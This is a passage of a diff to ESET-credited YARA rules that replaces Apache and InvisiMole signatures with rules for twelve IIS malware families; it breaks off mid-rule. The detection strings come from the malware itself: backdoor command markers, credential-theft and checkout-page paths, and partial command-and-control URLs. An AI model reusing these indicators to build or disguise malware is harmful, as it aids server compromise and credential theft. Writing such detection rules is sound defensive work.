"https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/nukesped_lazarus/rich_headers_IconicPayloads_3CX.yar#L6-L23" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" + hash = "3b88cda62cdd918b62ef5aa8c5a73a46f176d18b" + hash = "cad1120d91b812acafef7175f949dd1b09c6c21a" + hash = "5b03294b72c0caa5fb20e7817002c600645eb475" + hash = "7491bd61ed15298ce5ee5ffd01c8c82a2cdb40ec" + logic_hash = "f11a1db798bfcc534982bdf6afaae154b095b6a1e0896e75e2791c01e51a1c16" score = 75 quality = 80 tags = "" - license = "BSD 2-Clause" - version = 1 - - strings: - $64 = { - 48 69 ( 9C 24 ?? ?? ?? ?? | 5C 24 ?? | D2) 6D 4E C6 41 // imul rbx, [rsp+_buf], 41C64E6Dh - 8B (0C 16 | 34 07) // mov ecx, [rsi+rdx] - 48 81 C? 39 30 00 00 // add rbx, 12345 - ( 31 D? | // xor ecx, ebx - 31 D? 48 89 9C 24 ?? ?? ?? ?? | // mov [rsp+_buf], rbx - 31 D? 48 89 5C 24 ?? ) // ^ optional - 89 (0C 10 | 34 01) // mov [rax+rdx], ecx - 48 83 C? 04 // add rdx, 4 - 48 (81 FA | 3D ) ?? ?? ?? ?? // cmp rdx, _size - 75 D? // jnz short _begin - } - $32 = { - 69 C9 6D 4E C6 41 // imul ecx, 41C64E6Dh - 8B B4 1A ?? ?? ?? ?? // mov esi, [edx+ebx+_data] - 81 C1 39 30 00 00 // add ecx, 12345 - 31 CE // xor esi, ecx - 89 34 10 // mov [eax+edx], esi - 83 C2 04 // add edx, 4 - 81 FA ?? ?? ?? ?? // cmp edx, _size - 75 DD // jnz short loc_69A5 - } condition: - any of them + pe.rich_signature.toolid(259,30818)==9 and pe.rich_signature.toolid(256,31329)==1 and pe.rich_signature.toolid(261,30818)>=30 and pe.rich_signature.toolid(261,30818)<=38 and pe.rich_signature.toolid(261,29395)>=134 and pe.rich_signature.toolid(261,29395)<=164 and pe.rich_signature.toolid(257,29395)>=6 and pe.rich_signature.toolid(257,29395)<=14 } -import "elf" +import "pe" -rule ESET_Helimodproxy +rule ESET_IIS_Group02 { meta: - description = "HelimodProxy malicious Apache module" - author = "ESET, spol. s r.o." - id = "8c05bd0b-9645-580c-ac80-58e45b2a8884" - date = "2024-04-27" - modified = "2024-04-27" + description = "Detects Group 2 native IIS malware family" + author = "ESET Research" + id = "945e3748-1072-55f3-abaa-903dfc250294" + date = "2021-08-04" + modified = "2021-08-04" reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/windigo/helimod.yar#L32-L54" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" - hash = "e39667aa137e315bc26eaef791ccab52938fd809" - logic_hash = "9e3d57add1042eff41b42f0c8d46ed37af4092d5af4d4b2088b07992a4649bc2" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/badiis/badiis.yar#L134-L155" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" + logic_hash = "3fa2b8fed3c580f446b55412a920a5cfed2317b06aa93d059e9f89fdbec8f683" score = 75 - quality = 80 + quality = 76 tags = "" license = "BSD 2-Clause" - version = 1 + version = "1" strings: - $1 = "secret\x00%s:%u" - $2 = "/%s/%s/%s%s" - $3 = "ad\x00pmt" - $4 = "mod_dir.c" - $5 = "pmtad" + $s1 = "HttpModule.pdb" ascii wide + $s2 = "([\\w+%]+)=([^&]*)" + $s3 = "([\\w+%]+)=([^!]*)" + $s4 = "cmd.exe" + $s5 = "C:\\Users\\Iso\\Documents\\Visual Studio 2013\\Projects\\IIS 5\\x64\\Release\\Vi.pdb" ascii wide + $s6 = "AVRSAFunction" condition: - ESET_Apachemodule_PRIVATE and ($1 or ($2 and $3) or ($4 and $5)) + ESET_IIS_Native_Module_PRIVATE and 3 of ($s*) } -import "elf" +import "pe" -rule ESET_Helimodredirect +rule ESET_IIS_Group03 { meta: - description = "HelimodRedirect malicious Apache module" - author = "ESET, spol. s r.o." - id = "d8fe674d-8895-5501-b2e3-f74c386e10f0" - date = "2024-04-27" - modified = "2024-04-27" + description = "Detects Group 3 native IIS malware family" + author = "ESET Research" + id = "9caf9b3e-611e-5e0e-a7ee-9e7515679022" + date = "2021-08-04" + modified = "2021-08-04" reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/windigo/helimod.yar#L56-L79" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" - hash = "e39667aa137e315bc26eaef791ccab52938fd809" - logic_hash = "1a85cae7ee354e5d96e88781b4e0a49757016d8b64dfb80c07a13b36bf9091e2" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/badiis/badiis.yar#L157-L176" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" + logic_hash = "d811c2ac610780bf968e86e8fd302cffc9434902e547399d06fdeb30d1719f51" score = 75 quality = 80 tags = "" license = "BSD 2-Clause" - version = 1 + version = "1" strings: - $h1 = "secret\x00%s:%" - $h2 = "$!%#!$" - $h3 = "mod_security2.c" - $r1 = "%s?DOM=%s&URI=%s" - $r2 = "REDIRECT_URL" + $s1 = "IIS-Backdoor.dll" + $s2 = "CryptStringToBinaryA" + $s3 = "CreateProcessA" + $s4 = "X-Cookie" condition: - ESET_Apachemodule_PRIVATE and any of ($h*) and any of ($r*) + ESET_IIS_Native_Module_PRIVATE and 3 of ($s*) } -import "elf" +import "pe" -rule ESET_Helimodsteal +rule ESET_IIS_Group04_Rgdoor { meta: - description = "HelimodSteal malicious Apache module" - author = "ESET, spol. s r.o." - id = "7b080f21-d6e3-5dda-bfd9-fb9d82fbb98e" - date = "2024-04-27" - modified = "2024-04-27" + description = "Detects Group 4 native IIS malware family (RGDoor)" + author = "ESET Research" + id = "64a0e664-a4d9-555b-a11b-5f7d9d0678b1" + date = "2021-08-04" + modified = "2021-08-04" reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/windigo/helimod.yar#L81-L105" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" - hash = "e39667aa137e315bc26eaef791ccab52938fd809" - logic_hash = "9c0a5842dc986fec667fc7d7ad9d0c63b89b4a5ec87c9c9b72574ca5b15df928" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/badiis/badiis.yar#L178-L199" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" + logic_hash = "be615dc0cc8bf0fd52cc5a88a3759c1cb1cd18703de74d16f5cce3eabccf91c6" score = 75 quality = 80 tags = "" license = "BSD 2-Clause" - version = 2 + version = "1" strings: - $h1 = "secret\x00%s:%" - $h2 = "$!%#!$" - $h3 = "mod_security2.c" - $s1 = "p0sT5n1F3r" - $s2 = "ENGINE_ON" - $s3 = "POST /" + $i1 = "RGSESSIONID=" + $s2 = "upload$" + $s3 = "download$" + $s4 = "cmd$" + $s5 = "cmd.exe" condition: - ESET_Apachemodule_PRIVATE and any of ($h*) and any of ($s*) + ESET_IIS_Native_Module_PRIVATE and ($i1 or all of ($s*)) } -rule ESET_Onimiki : LINUX_ONIMIKI +import "pe" + +rule ESET_IIS_Group05_Iistealer { meta: - description = "Linux/Onimiki malicious DNS server" - author = "Olivier Bilodeau <bilodeau@eset.com>" - id = "3a99799f-fbb4-5fee-a796-3310acd10e17" - date = "2014-02-06" - modified = "2014-04-04" + description = "Detects Group 5 native IIS malware family (IIStealer)" + author = "ESET Research" + id = "598ec6b2-0349-5da7-acad-72ef2468b927" + date = "2021-08-04" + modified = "2021-08-04" reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/windigo/windigo-onimiki.yar#L32-L59" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" - logic_hash = "eac30f5c9a9606d1d0e14c55e0532c54976fbb0d2e4f5cd2d9f719b77e07161a" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/badiis/badiis.yar#L201-L232" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" + logic_hash = "5dff445121fda59df805d6fcb5db3f8f8e52a6e63e2da2a6875f8c9ad9cafc72" score = 75 quality = 80 - tags = "LINUX/ONIMIKI" - malware = "Linux/Onimiki" - operation = "Windigo" - contact = "windigo@eset.sk" + tags = "" license = "BSD 2-Clause" + version = "1" strings: - $a1 = {43 0F B6 74 2A 0E 43 0F B6 0C 2A 8D 7C 3D 00 8D} - $a2 = {74 35 00 8D 4C 0D 00 89 F8 41 F7 E3 89 F8 29 D0} - $a3 = {D1 E8 01 C2 89 F0 C1 EA 04 44 8D 0C 92 46 8D 0C} - $a4 = {8A 41 F7 E3 89 F0 44 29 CF 29 D0 D1 E8 01 C2 89} - $a5 = {C8 C1 EA 04 44 8D 04 92 46 8D 04 82 41 F7 E3 89} - $a6 = {C8 44 29 C6 29 D0 D1 E8 01 C2 C1 EA 04 8D 04 92} - $a7 = {8D 04 82 29 C1 42 0F B6 04 21 42 88 84 14 C0 01} - $a8 = {00 00 42 0F B6 04 27 43 88 04 32 42 0F B6 04 26} - $a9 = {42 88 84 14 A0 01 00 00 49 83 C2 01 49 83 FA 07} + $s1 = "tojLrGzFMbcDTKcH" ascii wide + $s2 = "4vUOj3IutgtrpVwh" ascii wide + $s3 = "SoUnRCxgREXMu9bM" ascii wide + $s4 = "9Zr1Z78OkgaXj1Xr" ascii wide + $s5 = "cache.txt" ascii wide + $s6 = "/checkout/checkout.aspx" ascii wide + $s7 = "/checkout/Payment.aspx" ascii wide + $s8 = "/privacy.aspx" + $s9 = "X-IIS-Data" + $s10 = "POST" + $s11 = {C7 ?? CF 2F 00 63 00 C7 ?? D3 68 00 65 00 C7 ?? D7 63 00 6B 00 C7 ?? DB 6F 00 75 00 C7 ?? DF 74 00 2F 00 C7 ?? E3 63 00 68 00 C7 ?? E7 65 00 63 00 C7 ?? EB 6B 00 6F 00 C7 ?? EF 75 00 74 00 C7 ?? F3 2E 00 61 00 C7 ?? F7 73 00 70 00 C7 ?? FB 78 00 00 00} + $s12 = {C7 ?? AF 2F 00 70 00 C7 ?? B3 72 00 69 00 C7 ?? B7 76 00 61 00 C7 ?? BB 63 00 79 00 C7 ?? BF 2E 00 61 00 C7 ?? C3 73 00 70 00 C7 ?? C7 78 00 00 00} condition: - all of them + ESET_IIS_Native_Module_PRIVATE and 3 of ($s*) } import "pe" -rule ESET_Apt_Windows_Invisimole_Logs : FILE +rule ESET_IIS_Group06_ISN { meta: - description = "Detects log files with collected created by InvisiMole's RC2CL backdoor" + description = "Detects Group 6 native IIS malware family (ISN)" author = "ESET Research" - id = "151883ad-1f44-55b4-b12a-f0d399527189" - date = "2021-05-17" - modified = "2021-05-17" + id = "1f68fc42-61a3-5a7d-9daa-31ae3b561837" + date = "2021-08-04" + modified = "2021-08-04" reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/invisimole/invisimole.yar#L54-L77" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" - logic_hash = "d42423ccc768f1823c76d5cb2aec26434c796fc35bd4e2fbf435fcf7997d3ff0" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/badiis/badiis.yar#L234-L259" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" + logic_hash = "2f59034a642a9b92fc88922433cd5923be02332159cba5e16d99d9523ed43205" score = 75 quality = 80 - tags = "FILE" + tags = "" license = "BSD 2-Clause" version = "1" + strings: + $s1 = "isn7 config reloaded" + $s2 = "isn7 config NOT reloaded, not found or empty" + $s3 = "isn7 log deleted" + $s4 = "isn7 log not deleted, ERROR 0x%X" + $s5 = "isn7 log NOT found" + $s6 = "isn_reloadconfig" + $s7 = "D:\\soft\\Programming\\C++\\projects\\isapi\\isn7" + $s8 = "get POST failed %d" + $s9 = "isn7.dll" + condition: - uint32(0)==0x08F1CAA1 or uint32(0)==0x08F1CAA2 or uint32(0)==0x08F1CCC0 or uint32(0)==0x08F2AFC0 or uint32(0)==0x083AE4DF or uint32(0)==0x18F2CBB1 or uint32(0)==0x1900ABBA or uint32(0)==0x24F2CEA1 or uint32(0)==0xDA012193 or uint32(0)==0xDA018993 or uint32(0)==0xDA018995 or uint32(0)==0xDD018991 + ESET_IIS_Native_Module_PRIVATE and 3 of ($s*) } import "pe" -rule ESET_Apt_Windows_Invisimole_SFX_Dropper : FILE +rule ESET_IIS_Group07_Iispy { meta: - description = "Detects trojanized InvisiMole files: patched RAR SFX droppers with added InvisiMole blobs (config encrypted XOR 2A at the end of a file)" + description = "Detects Group 7 native IIS malware family (IISpy)" author = "ESET Research" - id = "08490bcd-3139-5fac-9c6c-5a32acb7217a" - date = "2021-05-17" - modified = "2021-05-17" + id = "64ed0189-a0be-5592-b9c6-1622700a7ed7" + date = "2021-08-04" + modified = "2021-08-04" reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/invisimole/invisimole.yar#L79-L95" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" - logic_hash = "6ca248d42c1e889988e5931d80df071cb20e623fb0c4a208044cabe073f71ce4" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/badiis/badiis.yar#L261-L296" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" + logic_hash = "ec5db5f36d06f9b0bdfe598fc72431da35afc1473dcc29f437a0f48ea9835a03" score = 75 quality = 80 - tags = "FILE" + tags = "" license = "BSD 2-Clause" version = "1" strings: - $encrypted_config = {5F 59 4F 58 19 18 04 4E 46 46 2A 5D 59 5A 58 43 44 5E 4C 7D 2A 0F 2A 59 2A 78 2A 4B 2A 58 2A 0E 2A 6F 2A 72 2A 4B 2A 0F 2A 4E 2A 04 2A 0F 2A 4E 2A 76 2A 0F 2A 79 2A 2A 2A 79 42 4F 46 46 6F 52 4F 49 5F 5E 4F 7D 2A 79 42 4F 46 46 19 18 04 4E 46 46 2A 7C 43 58 5E 5F 4B 46 6B 46 46 45 49 2A 66 45 4B 4E 66 43 48 58 4B 58 53 6B} + $s1 = "/credential/username" + $s2 = "/credential/password" + $s3 = "/computer/domain" + $s4 = "/computer/name" + $s5 = "/password" + $s6 = "/cmd" + $s7 = "%.8s%.8s=%.8s%.16s%.8s%.16s" + $s8 = "ImpersonateLoggedOnUser" + $s9 = "WNetAddConnection2W" + $t1 = "X-Forwarded-Proto" + $t2 = "Sec-Fetch-Mode" + $t3 = "Sec-Fetch-Site" + $t4 = "Cookie" + $t5 = {49 45 4E 44 AE 42 60 82} + $t6 = {89 50 4E 47 0D 0A 1A 0A 00 00 00 0D 49 48 44 52} condition: - uint16(0)==0x5A4D and $encrypted_config + ESET_IIS_Native_Module_PRIVATE and 2 of ($s*) and any of ($t*) } import "pe" -rule ESET_Apt_Windows_Invisimole_CPL_Loader : FILE +rule ESET_IIS_Group08 { meta: - description = "CPL loader" + description = "Detects Group 8 native IIS malware family" author = "ESET Research" - id = "feff8627-6085-5835-ac1b-d4522245f7db" - date = "2021-05-17" - modified = "2021-05-17" + id = "d0e9a5ec-b7f0-5d3f-93b4-d048503eb210" + date = "2021-08-04" + modified = "2021-08-04" reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/invisimole/invisimole.yar#L97-L118" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" - logic_hash = "cd5c19e14faa7fd3758b30193ccf2bed3692ad29d8216466523ca25d2abcfe88" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/badiis/badiis.yar#L298-L337" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" + logic_hash = "d5826d454d25ecbbb5da464da974023a247517d873cf10dc0eafa91e185451da" score = 75 - quality = 80 - tags = "FILE" + quality = 53 + tags = "" license = "BSD 2-Clause" version = "1" strings: - $s1 = "WScr%steObject(\"WScr%s.Run(\"::{20d04fe0-3a%s30309d}\\\\::{21EC%sDD-08002B3030%s\", 0);" - $s2 = "\\Control.js" wide - $s3 = "\\Control Panel.lnk" wide - $s4 = "FPC 3.0.4 [2019/04/13] for x86_64 - Win64" - $s5 = "FPC 3.0.4 [2019/04/13] for i386 - Win32" - $s6 = "imageapplet.dat" wide - $s7 = "wkssvmtx" + $i1 = "FliterSecurity.dll" + $i2 = "IIS7NativeModule.dll" + $i3 = "Ver1.0." + $s1 = "Cmd" + $s2 = "Realy path : %s" + $s3 = "Logged On Users : %d" + $s4 = "Connect OK!" + $s5 = "You are fucked!" + $s6 = "Shit!Error" + $s7 = "Where is the God!!" + $s8 = "Shit!Download False!" + $s9 = "Good!Run OK!" + $s10 = "Shit!Run False!" + $s11 = "Good!Download OK!" + $s12 = "[%d]safedog" + $s13 = "ed81bfc09d069121" + $s14 = "a9478ef01967d190" + $s15 = "af964b7479e5aea2" + $s16 = "1f9e6526bea65b59" + $s17 = "2b9e9de34f782d31" + $s18 = "33cc5da72ac9d7bb" + $s19 = "b1d71f4c2596cd55" + $s20 = "101fb9d9e86d9e6c" condition: - uint16(0)==0x5A4D and (3 of them ) + ESET_IIS_Native_Module_PRIVATE and 1 of ($i*) and 3 of ($s*) } import "pe" -rule ESET_Apt_Windows_Invisimole_Wrapper_DLL +rule ESET_IIS_Group09 { meta: - description = "Detects InvisiMole wrapper DLL with embedded RC2CL and RC2FM backdoors, by export and resource names" + description = "Detects Group 9 native IIS malware family" author = "ESET Research" - id = "b9609b09-3ef5-5793-a3aa-4692cec367d9" - date = "2021-05-17" - modified = "2021-05-17" + id = "69d176bc-73b1-5c4d-bb7e-463d26e8e6a9" + date = "2021-08-04" + modified = "2021-08-04" reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/invisimole/invisimole.yar#L120-L138" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" - logic_hash = "156bc5bc7b0ed5c77a5a15e7799a3077d40150896476a60935cf21a9afe36856" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/badiis/badiis.yar#L339-L387" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" + logic_hash = "5f89f9488221b8db8d493b3c23b7f5edd957c15511148eca890558886c128192" score = 75 - quality = 80 + quality = 76 tags = "" license = "BSD 2-Clause" version = "1" + strings: + $i1 = "FliterSecurity.dll" + $i2 = {56565656565656565656565656565656} + $i3 = "app|hot|alp|svf|fkj|mry|poc|doc|20" xor + $i4 = "yisouspider|yisou|soso|sogou|m.sogou|sogo|sogou|so.com|baidu|bing|360" xor + $i5 = "baidu|m.baidu|soso|sogou|m.sogou|sogo|sogou|so.com|google|youdao" xor + $i6 = "118|abc|1go|evk" xor + $s1 = "AVCFuckHttpModuleFactory" + $s2 = "X-Forward" + $s3 = "fuck32.dat" + $s4 = "fuck64.dat" + $s5 = "&ipzz1=" + $s6 = "&ipzz2=" + $s7 = "&uuu=" + $s8 = "http://20.3323sf.c" xor + $s9 = "http://bj.whtjz.c" xor + $s10 = "http://bj2.wzrpx.c" xor + $s11 = "http://cs.whtjz.c" xor + $s12 = "http://df.e652.c" xor + $s13 = "http://dfcp.yyphw.c" xor + $s14 = "http://es.csdsx.c" xor + $s15 = "http://hz.wzrpx.c" xor + $s16 = "http://id.3323sf.c" xor + $s17 = "http://qp.008php.c" xor + $s18 = "http://qp.nmnsw.c" xor + $s19 = "http://sc.300bt.c" xor + $s20 = "http://sc.wzrpx.c" xor + $s21 = "http://sf2223.c" xor + $s22 = "http://sx.cmdxb.c" xor + $s23 = "http://sz.ycfhx.c" xor + $s24 = "http://xpq.0660sf.c" xor + $s25 = "http://xsc.b1174.c" xor + condition: - pe.exports("GetDataLength") and for any y in (0..pe.number_of_resources-1) : (pe.resources[y].type==pe.RESOURCE_TYPE_RCDATA and pe.resources[y].name_string=="R\x00C\x002\x00C\x00L\x00") and for any y in (0..pe.number_of_resources-1) : (pe.resources[y].type==pe.RESOURCE_TYPE_RCDATA and pe.resources[y].name_string=="R\x00C\x002\x00F\x00M\x00") + ESET_IIS_Native_Module_PRIVATE and any of ($i*) and 3 of ($s*) } import "pe" -rule ESET_Apt_Windows_Invisimole_DNS_Downloader : FILE +rule ESET_IIS_Group10 { meta: - description = "InvisiMole DNS downloader" + description = "Detects Group 10 native IIS malware family" author = "ESET Research" - id = "1caa6c8b-3798-556e-835e-885b7f3f4511" - date = "2021-05-17" - modified = "2021-05-17" + id = "31368b38-9128-594d-888d-e97d3edc7a1f" + date = "2021-08-04" + modified = "2021-08-04" reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/invisimole/invisimole.yar#L140-L170" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" - logic_hash = "88d6ed7ec1331153d19afc18473a4be2b214ad8af29fcf7051a2a8e40e088231" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/badiis/badiis.yar#L389-L423" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" + logic_hash = "48701168d7da726222227ef757f1a4005a49c0bf300123319ce03db09445b3ef" score = 75 quality = 80 - tags = "FILE" + tags = "" license = "BSD 2-Clause" version = "1" strings: - $d = "DnsQuery_A" - $s1 = "Wireshark-is-running-{9CA78EEA-EA4D-4490-9240-FC01FCEF464B}" xor - $s2 = "AddIns\\" ascii wide xor - $s3 = "pcornomeex." xor - $s4 = "weriahsek.rxe" xor - $s5 = "dpmupaceex." xor - $s6 = "TCPViewClass" xor - $s7 = "PROCMON_WINDOW_CLASS" xor - $s8 = "Key%C" - $s9 = "AutoEx%C" xor - $s10 = "MSO~" - $s11 = "MDE~" - $s12 = "DNS PLUGIN, Step %d" xor - $s13 = "rundll32.exe \"%s\",StartUI" + $s1 = "IIS7.dll" + $s2 = "<title>(.*?)title(.*?)>" + $s3 = "<meta(.*?)name(.*?)=(.*?)keywords(.*?)>" + $s4 = "<meta(.*?)name(.*?)=(.*?)description(.*?)>" + $s5 = "js.breakavs.co" + $s6 = "微信群-赛车PK10群【进群微信fun57644】_幸运飞艇_幸运28群" + $s7 = "北京赛车微信群,北京微信赛车群,北京赛车微信群,PK10群,北京赛车pk10微信群,PK10微信群,赛车微信群,北京赛车群," + $s8 = "北京赛车微信群,北京微信赛车群【进群微信号fun57644】北京微信赛车群,北京微信赛车" + $e1 = "Baiduspider" + $e2 = "Sosospider" + $e3 = "Sogou web spider" + $e4 = "360Spider" + $e5 = "YisouSpider" + $e6 = "sogou.com" + $e7 = "soso.com" + $e8 = "uc.cn" + $e9 = "baidu.com" + $e10 = "sm.cn" condition: - (( uint16(0)==0x5A4D) or ESET_Invisimole_Blob_PRIVATE) and $d and 5 of ($s*) + ESET_IIS_Native_Module_PRIVATE and 2 of ($e*) and 3 of ($s*) } import "pe" -rule ESET_Apt_Windows_Invisimole_RC2CL_Backdoor : FILE +rule ESET_IIS_Group11 { meta: - description = "InvisiMole RC2CL backdoor" + description = "Detects Group 11 native IIS malware family" author = "ESET Research" - id = "0228b8ee-bf03-504e-8cdf-8a1c9a79d54e" - date = "2021-05-17" - modified = "2021-05-17" + id = "e9dac67a-1675-5198-ad26-d555696844f9" + date = "2021-08-04" + modified = "2021-08-04" reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/invisimole/invisimole.yar#L172-L213" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" - logic_hash = "c38550023515d33eaaf0669cc8b874bcfd09653a07c7edbf72e3344d1cf31541" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/badiis/badiis.yar#L425-L455" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" + logic_hash = "a67b6b49b5fc2c7f260c06201c59478f5472de63091c510af82d526c410abb0c" score = 75 - quality = 78 - tags = "FILE" + quality = 80 + tags = "" license = "BSD 2-Clause" version = "1" strings: - $s1 = "RC2CL" wide - $s2 = "hp12KsNh92Dwd" wide - $s3 = "ZLib package %s: files: %d, total size: %d" wide - $s4 = "\\Un4seen" wide - $s5 = {9E 01 3A AD} - $s6 = "~mrc_" wide - $s7 = "~src_" wide - $s8 = "~wbc_" wide - $s9 = "zdf_" wide - $s10 = "~S0PM" wide - $s11 = "~A0FM" wide - $s12 = "~70Z63\\" wide - $s13 = "~E070C" wide - $s14 = "~N031E" wide - $s15 = "%szdf_%s.data" wide - $s16 = "%spicture.crd" wide - $s17 = "%s70zf_%s.cab" wide - $s18 = "%spreview.crd" wide - $s19 = "Value_Bck" wide - $s20 = "Value_WSFX_ZC" wide - $s21 = "MachineAccessStateData" wide - $s22 = "SettingsSR2" wide + $s1 = "DnsQuery_A" + $s2 = "&reurl=" + $s3 = "&jump=1" + $s4 = "JVVRaeof" + $s5 = "ncpmg::0" + $s6 = "zkpzz0cnnuqwnw0eqo" + $s7 = "jvvr<11yyy0cnnuqwnw0eqo130rjrAeofqwv?" condition: - (( uint16(0)==0x5A4D) or ESET_Invisimole_Blob_PRIVATE) and 5 of ($s*) + ESET_IIS_Native_Module_PRIVATE and 3 of ($s*) } import "pe" -rule ESET_Apt_Windows_Invisimole : FILE +rule ESET_IIS_Group12 { meta: - description = "InvisiMole magic values, keys and strings" + description = "Detects Group 12 native IIS malware family" author = "ESET Research" - id = "4d48996b-9792-57ba-a302-349220323712" - date = "2021-05-17" - modified = "2021-05-17" + id = "7278f2df-d18a-5d95-9c21-37906629a7f0" + date = "2021-08-04" + modified = "2021-08-04" reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/invisimole/invisimole.yar#L215-L255" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" - logic_hash = "7a2cff9febe77d718089ba4e1a33f3487594588892e418cec685bf22b156fa2b" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/badiis/badiis.yar#L457-L495" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" + logic_hash = "8da03328e3702aff8ea5de77fc220f326030c31972d27c0bd9b5918dca550aba" score = 75 - quality = 80 - tags = "FILE" + quality = 78 + tags = "" license = "BSD 2-Clause" version = "1" strings: - $s1 = "CryptProtectData" - $s2 = "CryptUnprotectData" - $s3 = {9E 01 3A AD} - $s4 = "GET /getversion2a/%d%.2X%.2X/U%sN HTTP/1.1" - $s5 = "PULSAR_LOADER.dll" - $check_magic_old_32 = {3? F9 FF D0 DE} - $check_magic_old_64 = {3? 64 FF D0 DE} - $check_magic_new_32 = {81 3? 86 DA 11 CE} - $check_magic_new_64 = {81 3? 64 DA 11 CE} + $s1 = "C:\\inetpub\\temp\\IIS Temporary Compressed Files\\" + $s2 = "F5XFFHttpModule.dll" + $s3 = "gtest_redir" + $s4 = "\\cmd.exe" nocase + $s5 = "iuuq;00" + $s6 = "?xhost=" + $s7 = "&reurl=" + $s8 = "?jump=1" + $s9 = "app|zqb" + $s10 = "ifeng|ivc|sogou|so.com|baidu|google|youdao|yahoo|bing|118114|biso|gougou|sooule|360|sm|uc" + $s11 = "sogou|so.com|baidu|google|youdao|yahoo|bing|gougou|sooule|360|sm.cn|uc" + $s12 = "Hotcss/|Hotjs/" + $s13 = "HotImg/|HotPic/" + $s14 = "msf connect error !!" + $s15 = "download ok !!" + $s16 = "download error !! " + $s17 = "param error !!" + $s18 = "Real Path: " + $s19 = "unknown cmd !" + $b1 = {15 BD 01 2E [-] 5E 40 08 97 [-] CF 8C BE 30 [-] 28 42 C6 3B} + $b2 = {E1 0A DC 39 [-] 49 BA 59 AB [-] BE 56 E0 57 [-] F2 0F 88 3E} condition: - (( uint16(0)==0x5A4D) or ESET_Invisimole_Blob_PRIVATE) and ( any of ($check_magic*)) and (2 of ($s*)) + 